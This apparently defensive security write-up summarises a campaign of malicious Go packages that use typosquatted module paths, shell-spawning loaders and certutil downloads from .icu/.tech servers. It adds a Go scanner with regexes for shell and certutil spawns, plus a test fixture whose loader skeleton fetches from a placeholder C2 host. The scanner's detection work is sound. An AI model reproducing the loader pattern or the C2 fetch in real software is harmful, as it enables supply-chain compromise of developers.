A set of 11 malicious Go packages has been discovered. The packages download and execute additional payloads from remote servers on both Windows and Linux systems: the code spawns a shell and fetches second-stage payloads from command-and-control endpoints, and those payloads can gather host information, access web browser data, and report back to their servers. The way the Go module ecosystem is structured lets deceptive modules appear credible, which increases the risk that malicious code is unintentionally integrated into development projects. The campaign is believed to be the work of a single threat actor because of similarities in command-and-control usage.
At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory.
Because the second stage delivers a bash script on Linux and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
Attackers exploit this confusion over module names, carefully crafting their malicious module paths to look trustworthy at a glance, which significantly increases the likelihood that developers inadvertently integrate destructive code into their projects.
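The two traits described above, lookalike module paths and code that spawns a shell to run something fetched from a .icu or .tech endpoint, are both cheap to check for in a build pipeline. The Go program below is an added defensive example, not code from the report or from any project it names. It flags go.mod requirements within two edits of a trusted module path and scans source files for the shell-spawn plus remote-endpoint combination. The allowlist, the sample go.mod, the sample source files and the placeholder host are all constructed for the example; only the .icu/.tech indicator comes from the page.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Finding is one indicator raised by the scan.
type Finding struct {
	Where  string // module path or file name
	Reason string
}

// trustedModules is a constructed allowlist; in practice it would be the
// organisation's approved module list.
var trustedModules = []string{
	"github.com/gorilla/mux",
	"github.com/spf13/cobra",
	"golang.org/x/crypto",
}

func min3(a, b, c int) int {
	if b < a {
		a = b
	}
	if c < a {
		a = c
	}
	return a
}

// levenshtein returns the byte-wise edit distance between a and b
// (module paths are ASCII, so bytes are sufficient here).
func levenshtein(a, b string) int {
	prev := make([]int, len(b)+1)
	cur := make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			cur[j] = min3(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev, cur = cur, prev
	}
	return prev[len(b)]
}

// requiredModules extracts module paths from both single-line and
// block-form require directives of a go.mod file.
func requiredModules(goMod string) []string {
	var paths []string
	inBlock := false
	for _, raw := range strings.Split(goMod, "\n") {
		line := strings.TrimSpace(raw)
		f := strings.Fields(line)
		switch {
		case line == "require (":
			inBlock = true
		case inBlock && line == ")":
			inBlock = false
		case inBlock && len(f) >= 2:
			paths = append(paths, f[0])
		case len(f) >= 3 && f[0] == "require":
			paths = append(paths, f[1])
		}
	}
	return paths
}

// LookalikeModules flags required modules that are within two edits of a
// trusted path without being that path: names that look credible at a glance.
func LookalikeModules(goMod string) []Finding {
	var out []Finding
	for _, p := range requiredModules(goMod) {
		for _, t := range trustedModules {
			if d := levenshtein(p, t); d > 0 && d <= 2 {
				out = append(out, Finding{p, "lookalike of trusted module " + t})
			}
		}
	}
	return out
}

var (
	shellSpawn  = regexp.MustCompile(`exec\.Command\(\s*"(sh|bash|/bin/sh|/bin/bash|cmd(\.exe)?|certutil(\.exe)?)"`)
	remoteFetch = regexp.MustCompile(`https?://[A-Za-z0-9.-]+\.(icu|tech)\b`)
)

// SuspiciousSources reports files showing the loader's two traits together
// (shell or certutil spawn plus a .icu/.tech endpoint) as HIGH; either trait
// alone is only a weak signal and is reported as LOW.
func SuspiciousSources(files map[string]string) []Finding {
	names := make([]string, 0, len(files))
	for n := range files {
		names = append(names, n)
	}
	sort.Strings(names) // deterministic output
	var out []Finding
	for _, n := range names {
		spawn := shellSpawn.MatchString(files[n])
		fetch := remoteFetch.MatchString(files[n])
		switch {
		case spawn && fetch:
			out = append(out, Finding{n, "HIGH: spawns shell and references .icu/.tech endpoint"})
		case spawn:
			out = append(out, Finding{n, "LOW: spawns shell/certutil"})
		case fetch:
			out = append(out, Finding{n, "LOW: references .icu/.tech endpoint"})
		}
	}
	return out
}

// Constructed sample inputs for the example (not taken from the report).
const sampleGoMod = `module example.com/app

go 1.22

require (
	github.com/gorila/mux v1.8.0
	github.com/spf13/cobra v1.8.0
)
require golang.org/x/crypto v0.20.0
`

var sampleFiles = map[string]string{
	// Skeleton of the loader shape the report describes, with a placeholder host.
	"vendor/github.com/gorila/mux/helper.go": `package mux
import ("net/http"; "os/exec")
func stage() {
	resp, _ := http.Get("https://placeholder-c2.icu/stage")
	_ = resp
	_ = exec.Command("sh", "-c", "echo placeholder")
}`,
	"internal/client.go": `package internal
import "net/http"
func fetch() { http.Get("https://api.example.com/v1") }`,
}

func main() {
	for _, f := range LookalikeModules(sampleGoMod) {
		fmt.Printf("%s: %s\n", f.Where, f.Reason)
	}
	for _, f := range SuspiciousSources(sampleFiles) {
		fmt.Printf("%s: %s\n", f.Where, f.Reason)
	}
}
```

On the sample input this reports `github.com/gorila/mux` as a lookalike of `github.com/gorilla/mux` and the vendored helper as HIGH, while the benign client that only talks to `api.example.com` raises nothing. The string regexes are a first pass only: a loader that assembles its command name or URL from obfuscated pieces will not match, so in a real pipeline this check belongs alongside a review of any module that imports both `os/exec` and `net/http` and alongside outbound-traffic monitoring on build hosts.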